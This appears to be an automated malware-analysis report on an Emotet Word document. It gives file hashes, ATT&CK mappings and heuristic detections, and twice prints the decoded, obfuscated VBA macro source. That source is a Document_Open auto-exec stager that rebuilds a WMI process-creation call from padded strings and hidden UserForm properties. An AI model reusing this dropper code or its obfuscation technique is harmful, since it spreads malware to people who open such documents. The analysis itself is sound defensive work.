Emotet Office (OLE) malware analysis — malicious · 052d7edc0e371362

MALICIOUS

Office (OLE)

179.5 KB Created: 2020-07-23 21:12:00 Authoring application: Microsoft Office Word First seen: 2020-09-15

MD5: 71ebb380a95e2ea9ef5f365b51c9a101 SHA-1: 79377dc78b0ee32943a253ab4f99a96672f07136 SHA-256: 052d7edc0e3713623074a7e629d4005eae2901c9ed7dce61fec770ec23d4db8c

262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open macro and a hidden UserForm command stager, which are indicative of Emotet's typical execution flow. The ClamAV detection explicitly names this file as 'Doc.Dropper.EmotetIOS-9402070-0', further supporting the Emotet family attribution. The macro's obfuscated nature and use of CreateObject suggest it is designed to download and execute a secondary payload.

Heuristics 7

ClamAV: Doc.Dropper.EmotetIOS-9402070-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.EmotetIOS-9402070-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12111 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12111 bytes
SHA-256: `949a969eaa81f59a17a931a37b4b667729443757c335dd326b9afc26bad89ee8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "viejthiofxeiblaup" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub _ Document_open() kaehzevloiquyaux End Sub Attribute VB_Name = "quauyneafceof" Attribute VB_Base = "0{BE59704E-9353-4C75-B18F-449F39ABA5BD}{9ADD418C-FB27-4A6F-B8F1-FE9B5036023A}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "yilxoiqugoimyeex" Function kaehzevloiquyaux() zeedfoochwus = Chr(quauyneafceof.Zoom + (450 / 30)) Dim stARYFOuT 'XOX stARYFOuT = Replace$("oClwoC", "oCl", "Mfa") beufnaey = "832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwvw832y2gbjkG&588((((0329y2yHGUI7qwvi832y2gbjkG&588((((0329y2yHGUI7qwvnm832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwvgm832y2gbjkG&588((((0329y2yHGUI7qwvt832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwv" + zeedfoochwus + "832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwv:832y2gbjkG&588((((0329y2yHGUI7qwvw832y2gbjkG&588((((0329y2yHGUI7qwvin832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwv3832y2gbjkG&588((((0329y2yHGUI7qwv2832y2gbjkG&588((((0329y2yHGUI7qwv_832y2gbjkG&588((((0329y2yHGUI7qwv" + quauyneafceof.soalweuccof + "832y2gbjkG&588((((0329y2yHGUI7qwvro832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwvce832y2gbjkG&588((((0329y2yHGUI7qwvs832y2gbjkG&588((((0329y2yHGUI7qwvs832y2gbjkG&588((((0329y2yHGUI7qwv" Dim qbmqjX6Ý 'XOX qbmqjX6Ý = Replace$("KR6âZJ1ÈjSrovBeQcyqeI", "KR6âZJ1ÈjSro", "fM6Ô7Ïqf") dayyey = lafjeal(beufnaey) Dim GULahwG 'XOX GULahwG = Replace$("aXpVIjEADVaciyY", "aXpVIjEAD", "y5ÞDpRmild") Set feuvvoajboech = CreateObject(dayyey) Dim bhb 'XOX bhb = Len("r6ÕYI8ËT8Ôds") xusxoarmaehqueir = quauyneafceof.xionbeasmaor.ControlTipText Dim LVaTGhD0åm 'XOX LVaTGhD0åm = 6 Do While LVaTGhD0åm < 6 + 8 LVaTGhD0åm = LVaTGhD0åm + 4: DoEvents Loop guuhlaxqueithheequ = dayyey + zeedfoochwus + quauyneafceof.merbaedzeiv.ControlTipText + xusxoarmaehqueir Dim pvc6ÛhaN 'XOX pvc6ÛhaN = 1 Do While pvc6ÛhaN < 1 + 5 pvc6ÛhaN = pvc6ÛhaN + 9: DoEvents Loop baifyiec = guuhlaxqueithheequ + quauyneafceof.soalweuccof Dim JmY6Ø 'XOX JmY6Ø = 2 Do While JmY6Ø < 2 + 5 JmY6Ø = JmY6Ø + 1: DoEvents Loop Set quavwievmeit = weelloy(baifyiec) Dim LPI 'XOX LPI = Replace$("OwmlbcTmg3ÉfD6å", "OwmlbcT", "PuE6Ù") dvse = Array("xxxxxxx", feuvvoajboech. _ Create(peachwoas, seohhiembin, quavwievmeit), "yyyyyyyy") Dim BMQKvYs 'XOX BMQKvYs = Replace$("UKKCRXkNjtcYwy", "UKKCRX", "Xa1ÈRSYp") End Function Function weelloy(liezfuumzeom) Set weelloy = CreateObject(liezfuumzeom) Dim rRPD 'XOX rRPD = Replace$("HlWD8ße8yOsg", "HlW", "QFEttRXR") weelloy.showwindow = (nuadther + peetvoimjous) + (leudsoeg + muqutheiytidvait) Dim d5ÒBUPDf3Âk 'XOX d5ÒBUPDf3Âk = 6 Do While d5ÒBUPDf3Âk < 6 + 2 d5ÒBUPDf3Âk = d5ÒBUPDf3Âk + 3: DoEvents Loop End Function Function lafjeal(yovcud) woafkaithkejleap = yovcud Dim gVUvKCRX 'XOX gVUvKCRX = Replace$("DgQNfSYpvd", "DgQNf", "yOtgIcYb") daisboaxdoak = Split(woafkaithkejleap, "832y2gbjkG&588((((0329y2yHGUI7qwv") Dim SUvTdi 'XOX SUvTdi = Len("bOLHKnZlGA") veimzipkaomseim = cdwer + Join(daisboaxdoak, t) Dim DjtqQNon 'XOX DjtqQNon = Replace$("WIUnikuEkJesbXa1Ð6ÁWQS", "WIUnikuEkJ", "yTmL8É4ËF") lafjeal = veimzipkaomseim Dim B1mPAvPu 'XOX B1mPAvPu = 2 Do While B1mPAvPu < 2 + 9 B1mPAvPu = B1mPAvPu + 7: DoEvents Loop End Function Function peachwoas() vfd = quauyneafceof.reujgiekgoechquion.Pages(12 / 12).ControlTipText Dim aShaq 'XOX aShaq = 4 Do While aShaq < 4 + 1 aShaq = aShaq + 9: DoEvents Loop peachwoas = lafjeal(vfd) Dim lccTipGOf 'XOX lccTipGOf = Replace$("QNonddikqkuEkJrR2Ü", "QNonddikq", "oesjWQShR") End Function ' Processing file: / ... (truncated)

SHA-256: 949a969eaa81f59a17a931a37b4b667729443757c335dd326b9afc26bad89ee8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "viejthiofxeiblaup"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
kaehzevloiquyaux
End Sub


Attribute VB_Name = "quauyneafceof"
Attribute VB_Base = "0{BE59704E-9353-4C75-B18F-449F39ABA5BD}{9ADD418C-FB27-4A6F-B8F1-FE9B5036023A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "yilxoiqugoimyeex"
Function kaehzevloiquyaux()
zeedfoochwus = Chr(quauyneafceof.Zoom + (450 / 30))
Dim stARYFOuT 'XOX
stARYFOuT = Replace$("oClwoC", "oCl", "Mfa")
beufnaey = "832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwvw832y2gbjkG&588((((0329y2yHGUI7qwvi832y2gbjkG&588((((0329y2yHGUI7qwvnm832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwvgm832y2gbjkG&588((((0329y2yHGUI7qwvt832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwv" + zeedfoochwus + "832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwv:832y2gbjkG&588((((0329y2yHGUI7qwvw832y2gbjkG&588((((0329y2yHGUI7qwvin832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwv3832y2gbjkG&588((((0329y2yHGUI7qwv2832y2gbjkG&588((((0329y2yHGUI7qwv_832y2gbjkG&588((((0329y2yHGUI7qwv" + quauyneafceof.soalweuccof + "832y2gbjkG&588((((0329y2yHGUI7qwvro832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwvce832y2gbjkG&588((((0329y2yHGUI7qwvs832y2gbjkG&588((((0329y2yHGUI7qwvs832y2gbjkG&588((((0329y2yHGUI7qwv"
Dim qbmqjX6Ý 'XOX
qbmqjX6Ý = Replace$("KR6âZJ1ÈjSrovBeQcyqeI", "KR6âZJ1ÈjSro", "fM6Ô7Ïqf")
dayyey = lafjeal(beufnaey)
Dim GULahwG 'XOX
GULahwG = Replace$("aXpVIjEADVaciyY", "aXpVIjEAD", "y5ÞDpRmild")
Set feuvvoajboech = CreateObject(dayyey)
Dim bhb 'XOX
bhb = Len("r6ÕYI8ËT8Ôds")
xusxoarmaehqueir = quauyneafceof.xionbeasmaor.ControlTipText
Dim LVaTGhD0åm 'XOX
LVaTGhD0åm = 6
Do While LVaTGhD0åm < 6 + 8
LVaTGhD0åm = LVaTGhD0åm + 4: DoEvents
Loop
guuhlaxqueithheequ = dayyey + zeedfoochwus + quauyneafceof.merbaedzeiv.ControlTipText + xusxoarmaehqueir
Dim pvc6ÛhaN 'XOX
pvc6ÛhaN = 1
Do While pvc6ÛhaN < 1 + 5
pvc6ÛhaN = pvc6ÛhaN + 9: DoEvents
Loop
baifyiec = guuhlaxqueithheequ + quauyneafceof.soalweuccof
Dim JmY6Ø 'XOX
JmY6Ø = 2
Do While JmY6Ø < 2 + 5
JmY6Ø = JmY6Ø + 1: DoEvents
Loop
Set quavwievmeit = weelloy(baifyiec)
Dim LPI 'XOX
LPI = Replace$("OwmlbcTmg3ÉfD6å", "OwmlbcT", "PuE6Ù")
dvse = Array("xxxxxxx", feuvvoajboech. _
Create(peachwoas, seohhiembin, quavwievmeit), "yyyyyyyy")
Dim BMQKvYs 'XOX
BMQKvYs = Replace$("UKKCRXkNjtcYwy", "UKKCRX", "Xa1ÈRSYp")
End Function
Function weelloy(liezfuumzeom)
Set weelloy = CreateObject(liezfuumzeom)
Dim rRPD 'XOX
rRPD = Replace$("HlWD8ße8yOsg", "HlW", "QFEttRXR")
weelloy.showwindow = (nuadther + peetvoimjous) + (leudsoeg + muqutheiytidvait)
Dim d5ÒBUPDf3Âk 'XOX
d5ÒBUPDf3Âk = 6
Do While d5ÒBUPDf3Âk < 6 + 2
d5ÒBUPDf3Âk = d5ÒBUPDf3Âk + 3: DoEvents
Loop
End Function
Function lafjeal(yovcud)
woafkaithkejleap = yovcud
Dim gVUvKCRX 'XOX
gVUvKCRX = Replace$("DgQNfSYpvd", "DgQNf", "yOtgIcYb")
daisboaxdoak = Split(woafkaithkejleap, "832y2gbjkG&588((((0329y2yHGUI7qwv")
Dim SUvTdi 'XOX
SUvTdi = Len("bOLHKnZlGA")
veimzipkaomseim = cdwer + Join(daisboaxdoak, t)
Dim DjtqQNon 'XOX
DjtqQNon = Replace$("WIUnikuEkJesbXa1Ð6ÁWQS", "WIUnikuEkJ", "yTmL8É4ËF")
lafjeal = veimzipkaomseim
Dim B1mPAvPu 'XOX
B1mPAvPu = 2
Do While B1mPAvPu < 2 + 9
B1mPAvPu = B1mPAvPu + 7: DoEvents
Loop
End Function
Function peachwoas()
vfd = quauyneafceof.reujgiekgoechquion.Pages(12 / 12).ControlTipText
Dim aShaq 'XOX
aShaq = 4
Do While aShaq < 4 + 1
aShaq = aShaq + 9: DoEvents
Loop
peachwoas = lafjeal(vfd)
Dim lccTipGOf 'XOX
lccTipGOf = Replace$("QNonddikqkuEkJrR2Ü", "QNonddikq", "oesjWQShR")
End Function


' Processing file: /
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.